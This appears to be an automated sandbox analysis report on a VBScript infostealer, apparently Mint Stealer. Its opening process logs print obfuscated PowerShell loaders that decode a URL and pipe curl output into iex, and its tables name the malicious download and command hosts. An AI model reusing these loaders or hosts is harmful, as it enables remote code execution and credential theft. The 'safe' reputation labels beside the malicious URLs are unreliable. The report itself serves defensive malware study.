            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)Jump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information121
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            121
            Scripting
            111
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts11
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            21
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution
            Logon Script (Windows)Logon Script (Windows)111
            Process Injection
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials13
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576836 Sample: 67618a47ee8c5.vbs Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 57 pko-download.kagyouth.co.ke 2->57 59 gsosnub8zg3.top 2->59 61 www.google.com 2->61 71 Suricata IDS alerts for network traffic 2->71 73 Yara detected Mint Stealer 2->73 75 Sigma detected: WScript or CScript Dropper 2->75 77 6 other signatures 2->77 11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 91 VBScript performs obfuscated calls to suspicious functions 11->91 93 Obfuscated command line found 11->93 95 Windows Scripting host queries suspicious COM object (likely to drop second stage) 11->95 97 2 other signatures 11->97 14 cmd.exe 3 2 11->14         started        16 cmd.exe 1 11->16         started        18 cmd.exe 11->18         started        process6 process7 20 wscript.exe 16 14->20         started        24 conhost.exe 14->24         started        26 conhost.exe 16->26         started        28 curl.exe 2 16->28         started        31 wscript.exe 18->31         started        33 conhost.exe 18->33         started        dnsIp8 51 C:\Users\user\AppData\Local\Temp\bmkvfo.js, ISO-8859 20->51 dropped 79 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->79 35 wscript.exe 20->35         started        81 Obfuscated command line found 26->81 83 Creates processes via WMI 26->83 63 pko-download.kagyouth.co.ke 45.11.180.77, 443, 49709, 49711 M247GB Germany 28->63 65 127.0.0.1 unknown unknown 28->65 53 C:\Users\Public\67618a47ee8cd.vbs, ASCII 28->53 dropped 55 C:\Users\user\AppData\Local\Temp\iethuj.js, ISO-8859 31->55 dropped 85 System process connects to network (likely due to code injection or exploit) 31->85 37 wscript.exe 1 31->37         started        file9 signatures10 process11 signatures12 40 conhost.exe 35->40         started        43 conhost.exe 35->43         started        87 Windows Scripting host queries suspicious COM object (likely to drop second stage) 37->87 process13 signatures14 89 Obfuscated command line found 40->89 45 powershell.exe 14 15 40->45         started        49 powershell.exe 15 43->49         started        process15 dnsIp16 67 www.google.com 172.217.19.228, 49740, 49741, 80 GOOGLEUS United States 45->67 99 Queries Google from non browser process on port 80 45->99 69 gsosnub8zg3.top 193.149.129.61, 49732, 49733, 80 DANISCODK Denmark 49->69 signatures17

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsWinsta00%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/list_files.phpk0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/ion0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/jsX:.0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbscurl0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/list_files.php0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/list_files.phpf0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/js/bmkvfo.txt0%Avira URL Cloudsafe
            http://gsosnub8zg3.top0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/js/iethuj.txtke0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs30%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs50%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/js/iethuj.txt720%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/js/iethuj.txt88.amsi.csv80%Avira URL Cloudsafe
            http://gsosnub8zg3.top/1.php?s=mints210%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/list_files.php50%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsF0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/js0%Avira URL Cloudsafe
            http://www.google.comx0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs&0%Avira URL Cloudsafe
            https://pko-download.kagyouth.co.ke/js/iethuj.txt0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            gsosnub8zg3.top
            193.149.129.61
            truetrue
              unknown
              pko-download.kagyouth.co.ke
              45.11.180.77
              truetrue
                unknown
                www.google.com
                172.217.19.228
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://pko-download.kagyouth.co.ke/js/bmkvfo.txttrue
                  • Avira URL Cloud: safe
                  unknown
                  https://pko-download.kagyouth.co.ke/list_files.phptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://gsosnub8zg3.top/1.php?s=mints21true
                  • Avira URL Cloud: safe
                  unknown
                  https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbstrue
                  • Avira URL Cloud: safe
                  unknown
                  https://pko-download.kagyouth.co.ke/js/iethuj.txttrue
                  • Avira URL Cloud: safe
                  unknown
                  http://www.google.com/false
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.google.com/intl/en/about/products?tab=whpowershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsWinsta0curl.exe, 00000004.00000002.2172280031.000001979CB30000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://pko-download.kagyouth.co.ke/ionwscript.exe, 00000007.00000002.2284471756.0000015CCBA8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2282477339.0000015CCBA89000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schema.org/WebPapowershell.exe, 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://pko-download.kagyouth.co.ke/wscript.exe, 0000000A.00000003.2262779914.000001E9B1122000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2265704354.000001E9AF2CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262502439.000001E9AF382000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267541819.000001E9B1123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266409480.000001E9AF382000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2265742678.000001E9AF2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266685065.000001E9AF635000.00000004.00000020.00020000.00000000.sdmp, 67618a47ee8cd.vbs.4.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifpowershell.exe, 00000011.00000002.2332748509.000001CA010F4000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.google.com/preferences?hl=enXpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA558A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA55DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA101D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0044C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A27000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Licensepowershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://news.google.com/?tab=wnpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://pko-download.kagyouth.co.ke/list_files.phpfwscript.exe, 00000007.00000002.2284642077.0000015CCBB04000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281970950.0000015CCBB03000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281733327.0000015CCBAF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://gsosnub8zg3.toppowershell.exe, 0000000F.00000002.2374218432.0000024EA5359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA556E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA018B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbscurlcurl.exe, 00000004.00000002.2172280031.000001979CB30000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://docs.google.com/document/?usp=docs_alcpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://pko-download.kagyouth.co.ke/list_files.phpkwscript.exe, 0000000A.00000003.2262573242.000001E9AF339000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266195441.000001E9AF33D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schema.org/WebPagepowershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00FDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01014000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA010E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA010F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://0.google.com/powershell.exe, 0000000F.00000002.2374218432.0000024EA3FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/webhp?tab=wwpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/logos/doodles/2024/seasonal-holidays-20powershell.exe, 00000011.00000002.2332748509.000001CA0047B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://pko-download.kagyouth.co.ke/jsX:.wscript.exe, 00000007.00000003.2281995052.0000015CCD9CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2284895080.0000015CCD9D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://contoso.com/powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.2427312702.0000024EB3BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2346936701.000001CA10074000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.google.com/finance?tab=wepowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 0000000F.00000002.2374218432.0000024EA4694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA00B45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.google.compowershell.exe, 0000000F.00000002.2374218432.0000024EA3F9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA556E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA558A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2374218432.0000024EA5578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA0044C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2332748509.000001CA01A27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
